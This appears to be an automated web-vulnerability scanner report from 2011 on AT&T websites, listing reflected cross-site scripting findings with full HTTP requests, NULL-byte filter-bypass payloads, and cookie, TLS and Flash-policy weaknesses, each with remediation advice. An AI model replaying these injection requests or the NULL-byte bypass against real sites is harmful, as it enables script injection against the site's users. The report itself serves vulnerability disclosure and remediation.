NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dViewProfile%0078796"><script>alert(1)</script>2e7958efebf HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dWirelessProductLandingPage\u0026customerType\u003dW request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00db928"><script>alert(1)</script>8d222795a57 was submitted in the actionType\u003dWirelessProductLandingPage\u0026customerType\u003dW parameter. This input was echoed as db928"><script>alert(1)</script>8d222795a57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dWirelessProductLandingPage\u0026customerType\u003dW%00db928"><script>alert(1)</script>8d222795a57 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gnLinkId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eeede"><script>alert(1)</script>18d32a72235 was submitted in the gnLinkId parameter. This input was echoed as eeede"><script>alert(1)</script>18d32a72235 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?wtSlotClick=1-0068N7-0-7&actionType=ViewBillDetails&gnLinkId=t1002%00eeede"><script>alert(1)</script>18d32a72235 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml: ...[SNIP]... <input type= "hidden" name="urlParameters" value="wtSlotClick=1-0068N7-0-7&actionType=ViewBillDetails&gnLinkId=t1002%00eeede"><script>alert(1)</script>18d32a72235&reportActionEvent=A_LGN_LOGIN_SUB"/> ...[SNIP]...
1.34. https://www.att.com/olam/passthroughAction.myworld [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.att.com
Path:
/olam/passthroughAction.myworld
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b41de"><script>alert(1)</script>833dd78c556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b41de"><script>alert(1)</script>833dd78c556 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?%00b41de"><script>alert(1)</script>833dd78c556=1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the wtSlotClick request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fe681"><script>alert(1)</script>46dd8cc7bda was submitted in the wtSlotClick parameter. This input was echoed as fe681"><script>alert(1)</script>46dd8cc7bda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?wtSlotClick=1-0068N7-0-7%00fe681"><script>alert(1)</script>46dd8cc7bda&actionType=ViewBillDetails&gnLinkId=t1002 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the source request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 67765><script>alert(1)</script>c64b17441a6 was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cell-phone-service/go-phones/index.jsp?wtSlotClick=1-005Y6F-0-3&bfdcode=ATT&source=EC4425000000004067765><script>alert(1)</script>c64b17441a6 HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the source request parameter is copied into the HTML document as plain text between tags. The payload %00d8321<script>alert(1)</script>d3a2c64e822 was submitted in the source parameter. This input was echoed as d8321<script>alert(1)</script>d3a2c64e822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the source request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5c90e><script>alert(1)</script>d2d6d807fd7c85b07 was submitted in the source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c2bd'-alert(1)-'bd53b7431cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c578e"><a>7168338e878 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the attPersistantLocalization cookie is copied into the HTML document as plain text between tags. The payload %009b4fb<script>alert(1)</script>6f452528c90 was submitted in the attPersistantLocalization cookie. This input was echoed as 9b4fb<script>alert(1)</script>6f452528c90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the STANDSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8db01</script><a>11d0c5c284e was submitted in the STANDSESSIONID cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36394 Date: Tue, 06 Sep 2011 11:15:23 GMT Connection: close Set-Cookie: TLTHID=83E845A6D87910D8D14DB1D8B72CC1FD; Path=/; Domain=.att.com Set-Cookie: STANDSESSIONID=ZGXDTmQLv2RQ7mzNpt0ZkCQK!492242403; path=/; HttpOnly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]... <script type="text/javascript" charset="utf-8"> function SessionVars() { this.getCurrSessId = function() { var pSessionId = '8db01</script><a>11d0c5c284e'; return pSessionId; };
The value of the attPersistantLocalization cookie is copied into the HTML document as plain text between tags. The payload 85ff3<a>76c47519c0c was submitted in the attPersistantLocalization cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36422 Date: Tue, 06 Sep 2011 11:15:27 GMT Connection: close Set-Cookie: TLTHID=862DCB06D87910D8B2DEE982F040DE5E; Path=/; Domain=.att.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]... <span id="globalnav_Zip">1001085ff3<a>76c47519c0c</span> ...[SNIP]...
The value of the B2CSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002c8c9'-alert(1)-'97395e006ad was submitted in the B2CSESSIONID cookie. This input was echoed as 2c8c9'-alert(1)-'97395e006ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the attPersistantLocalization cookie is copied into the HTML document as plain text between tags. The payload ce3a4<script>alert(1)</script>881e2dde46a was submitted in the attPersistantLocalization cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the B2CSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99453'-alert(1)-'45e716f72c6 was submitted in the B2CSESSIONID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/passthroughAction.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/registrationAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.att.com">here</a>.</p> </body></html ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
colam_ctn=l%3Den_US; Domain=att.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eos/unauth/eosLogin HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/enterEmailForgotId.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.doview HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /shop/bundles/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /shop/bundles/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /shop/home-phone/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /shop/home-phone/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /shop/internet/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /shop/internet/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/accessories/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/data-connect-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/family-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/individual-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/cell-phones.jsp?wtSlotClick=1-005Y6F-0-1&feacondition=allphones&feaavailable=allphones&feafree=free&feapaytype=standard&startFilter=false&allTypes=on&allManus=on HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/pda-phones-smartphones.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/go-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/packages/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/services/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/transfer-your-number/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.wireless.att.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 05 Oct 2010 20:19:38 GMT ETag: "19b-491e4614f4a80" Accept-Ranges: bytes Content-Length: 411 Content-Type: application/xml Date: Tue, 06 Sep 2011 11:04:22 GMT Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/loginAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/passthroughAction.myworld HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /olam/registrationAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.att.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /accounts/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6AD5F370D87810D8B13BE982F040DE5E; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:32 GMT; path=/ Content-Length: 45366
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsl/shop/plansDirect.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/accessories/uverse-equipment.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equipment/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
